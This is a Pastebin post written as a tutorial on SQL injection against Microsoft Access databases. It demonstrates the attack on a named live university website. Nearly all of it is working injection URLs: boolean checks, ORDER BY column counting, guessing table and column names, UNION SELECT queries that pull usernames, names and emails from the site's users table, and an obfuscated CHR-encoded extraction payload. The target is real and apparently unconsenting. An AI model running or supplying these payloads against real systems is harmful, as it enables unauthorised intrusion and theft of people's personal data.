Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- MICROSOFT ACCESS SQL INJECTION
- Here I will show you how to perform SQL injection against MSACCESS database :)
- As we know MS_ACCESS have no information_schema so we have to brute force almost everything :p
- same like Mysql<=4 :)
- For better understanding , I am gonna perform injection on live site *_*
- Here we goes ,
- SITE: http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12
- lets check its false positive or not,
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=1 (no error)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1>1 (error *_* )
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=2 (Error)
- Its integer based, lets start injection now ;)
- Lets Find number of columns by simple order by statement,
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 1 ( no error )
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 2 (no error)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 3 (no error)
- .
- .
- .
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 7 (Error)
- so here number of columns are 6 :)
- we cant use union select statement unless we know at least one table_name.
- Lets find Table_name First. As I already mentioned MS_ACCESS have no information_schema, so we have to guess Table names here is your Query :)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [hii] and 1=1
- here is your result as "hii" is not a valid table_name :)
- Now replace a "hii" with some common table names,
- I highly recommended you to use some automated tools or script to do this, because its some what annoying process. :/ & time consuming too . I had written python script for this , I will publish it soon ;)
- For now lets do it manually ;
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [admin] and 1=1
- ...................... ( ERROR)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [tbl_user] and 1=1 ............................(ERROR)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [users] and 1=1 .......... ( BINGO!!!!!! NO ERROR) *_*
- So, its indicate that table "users" exists in the database :)
- Same procedure we can follow to find columns, here is our Query :)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count([hii]) from [users]) and 1=1
- now replace "hii" with different column_names, & repeat whole procedure again hope you understand :)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12and 0<=(select count([id]) from [users]) and 1=1
- .............( NO ERROR)
- after spending a lot time on column names I found " id , name,email " as a columns for table "users"
- NOW LETS DO IT UNION BASED,
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
- ............................(HERE WE MUST HAVE TO MENTION THE TABLE NAME )
- here we got vulnerable column 2.
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
- Lets extract some data from table "user" where columns names are " id, name, & email, username " ;)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,username,3,4,5,6 from users
- Once I posted this as a challenge on "Web InJ3ct0rs-SQL, XSS, LDAP, XPATH ,XML ,R/LFI Injections"
- I got a different solutions from Others, m gonna share one of it with you..
- Thanx to Janus Slovan for his solution, :)
- http://www.cityuniversity.edu.pk/cusitnew/news.php?id=-2%20UnIoN%20aLL%20SeLeCt%201,%20%20left(date(),10)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20CHR(106)%20%2b%20CHR(97)%20%2b%20CHR(110)%20%2b%20CHR(117)%20%2b%20CHR(115)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20username%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20name,3,4,5,6%20from%20users
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement